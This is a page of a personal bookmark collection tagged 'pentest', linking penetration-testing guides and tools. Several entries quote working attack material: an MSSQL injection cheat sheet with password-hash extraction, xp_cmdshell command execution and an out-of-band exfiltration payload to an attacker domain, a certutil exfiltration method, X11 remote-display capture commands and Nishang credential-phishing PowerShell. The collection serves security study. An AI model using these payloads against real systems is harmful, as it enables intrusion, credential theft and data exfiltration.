776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
page 6 / 6
Newer►
117 results tagged pentest x
  • thumbnail
    Windows Privilege Escalation Guide

    Script https://github.com/absolomb/WindowsEnum

    March 30, 2019 at 2:51:49 PM UTC - permalink -
    QRCode
    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
    windows privilege escalation guide post hacking pentest
  • thumbnail
    MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC - permalink -
    QRCode
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • thumbnail
    SQL Injection Cheat Sheet: MSSQL — GracefulSecurity 
    Version
SELECT @@version;
SELECT @@VERSION LIKE '%2008%';

User details
SELECT user;
SELECT current_user;
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT USER_NAME(2);
SELECT SUSER_SNAME();
SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);

Database details
SELECT DB_NAME();
SELECT DB_NAME(5);
SELECT name FROM master..sysdatabases;

Database credentials
SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;

Server details
SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');

Table Names
SELECT name FROM master..sysobjects WHERE xtype='U';
SELECT table_name FROM information_schema.tables;

Columns Names
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHERE name = 'tablename';
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';

No Quotes
SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;

String Concatenation
SELECT CONCAT('a','a','a');
SELECT 'a' %2b 'b' %2b 'c' %2b 'd';

Conditionals
IF 1=1 SELECT 'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;

Time-delay
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

Enable Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
EXEC sp_configure reconfigure;

Command Execution
EXEC master.dbo.xp_cmdshell 'cmd';

Enable Alternative Command Execution
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure reconfigure;
EXEC sp_configure 'OLE Automation Procedures', 1;
EXEC sp_configure reconfigure;

Alternative Command Execution
DECLARE @execmd INT;
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%system32cmd.exe /c';

"RunAs"
SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
EXECUTE AS USER = 'FooUser';

Read Files
BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='n' );

Out-of-Band Retrieval
;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  

Substrings
SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;

Retrieve Nth Line
SELECT TOP 1 table_name FROM information_schema.tables;
SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC - permalink -
    QRCode
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest
  • thumbnail
    Red Team Tales 0x01: From MSSQL to RCE - Tarlogic Security - Cyber Security and Ethical hacking 
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

    The procedure to achieve it is as follows:

    Declare a variable of “table” type to save the output that returns the xp_cmdshell procedure (remember that it returns the result in several rows).
Dump the output of the command to the previous variable.
Concatenate the rows of the table, separated by a line break.
Encode the resulting string in Base64 and save it in a variable.
Generate the certutil command, appending the string with the result.
Execute it.
    March 28, 2019 at 12:15:52 AM UTC - permalink -
    QRCode
    - https://www.tarlogic.com/en/blog/red-team-tales-0x01/
    htb querier giddy sql sqli mssql windows hacking redteam pentest rce xp_cmdshell
  • thumbnail
    Xp_cmdshell and permissions – Tibor Karaszi's SQL Server blog
    March 28, 2019 at 12:00:51 AM UTC - permalink -
    QRCode
    - http://sqlblog.karaszi.com/xp_cmdshell-and-permissions/
    xp_cmdshell mssql sql shell rce hacking pentest htb giddty querier
  • thumbnail
    Pen Test Diary: Cisco Network Penetration Testing
    March 13, 2019 at 9:34:28 PM UTC - permalink -
    QRCode
    - https://pentestdiary.blogspot.com/2017/08/cisco-network-penetration-testing.html
    pentest hackin cisco tuto howto
  • thumbnail
    SQL Injection Cheat Sheet | Netsparker
    March 6, 2019 at 12:48:20 PM UTC - permalink -
    QRCode
    - https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
    netsparker sql injection cheatsheet hacking pentest
  • thumbnail
    X11 Hacking · Zach Grace 
    apt-get install x11-utils xutils-dev imagemagick libxext-dev xspy
xwininfo -root -tree -display 172.16.31.102:0
xwd -root -screen -silent -display 10.10.10.10:0 > screenshot.xwd
convert screenshot.xwd screenshot.png

    Watching the display

    ./xwatchwin -u 0.5 172.16.31.102:0 root

    February 26, 2019 at 8:03:36 AM UTC - permalink -
    QRCode
    - https://zachgrace.com/training/x11/
    x11 hacking xwatchwin pentest redteam modbus ics scada ihm
  • thumbnail
    Nishang: A Post-Exploitation Framework

    Port-Scan

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

    Remove-Update

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

    Invoke-CredentialsPhish

    Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”

    February 20, 2019 at 11:00:59 PM UTC - permalink -
    QRCode
    - https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/
    nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
  • thumbnail
    Mimikatz (1/4) : présentation, fonctionnement et contre-mesures (tuto de A à Z)
    February 20, 2019 at 2:31:56 PM UTC - permalink -
    QRCode
    - https://fr.scribd.com/document/235639383/Mimikatz-1-4-presentation-fonctionnement-et-contre-mesures-tuto-de-A-a-Z
    mimikatz tutoriel hacking pentest howto
  • thumbnail
    Aki Helin / radamsa · GitLab
    February 10, 2019 at 11:06:36 PM UTC - permalink -
    QRCode
    - https://gitlab.com/akihe/radamsa
    radamsa fuzzer fuzz hacking pentest
  • thumbnail
    bettercap 2.x:

    And also https://www.evilsocket.net/2018/02/27/All-hail-bettercap-2-0-one-tool-to-rule-them-all/

    February 8, 2019 at 6:17:38 PM UTC - permalink -
    QRCode
    - https://miloserdov.org/?p=1112&PageSpeed=noscript
    bettercap dns http https spoofing arp hacking pentest mitm caplet
  • thumbnail
    GitHub - hslatman/awesome-industrial-control-system-security: A curated list of resources related to Industrial Control System (ICS) security.
    February 6, 2019 at 9:51:12 PM UTC - permalink -
    QRCode
    - https://github.com/hslatman/awesome-industrial-control-system-security
    tools awesome scada ics hacking pentest
  • A Virgil's Guide to Pentest: Escalation Time
    February 6, 2019 at 10:44:33 AM UTC * - permalink -
    QRCode
    - https://virgil-cj.blogspot.com/2018/02/escalation-time.html
    privesc windows hacking pentest
  • thumbnail
    How to evade Web Application Firewall and IPS using NMAP | Fzuckerman©
    February 5, 2019 at 2:50:50 PM UTC - permalink -
    QRCode
    - https://fzuckerman.wordpress.com/2016/10/03/how-to-evade-web-application-firewall-and-ips-using-nmap/
    nmap evasion ids ips waf hacking pentest
  • thumbnail
    NodeJs and NPM security
    January 28, 2019 at 11:33:47 AM UTC - permalink -
    QRCode
    - https://www.icloud.com/keynote/0HajbmYF-6AThnFln9_lQC30A#nodejs%5Fsecurity%5Fappsec%5Fcali%5F2019
    nodejs npm hacking pentest howto tools tuto ppt
  • thumbnail
    MEGA : Pentest Academy - Courses

    Big repo for Pentest Academy courses.

    January 22, 2019 at 3:48:04 PM UTC - permalink -
    QRCode
    - https://mega.nz/#F!bCgTkYhA!haaINPhu_CPjkcl1ZBBOSw
    courses pentestacademy pentest hacking formation support pdf mega
Links per page: 20 50 100
page 6 / 6
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation